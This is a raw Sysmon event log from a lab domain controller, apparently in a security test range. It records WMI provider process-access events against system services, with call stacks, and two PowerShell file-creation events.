16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BEAA-00000000AD01}11800C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BEAA-00000000AD01}11800C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bafytz5y.2lb.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6DAB-603E-BEAA-00000000AD01}1180015920C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 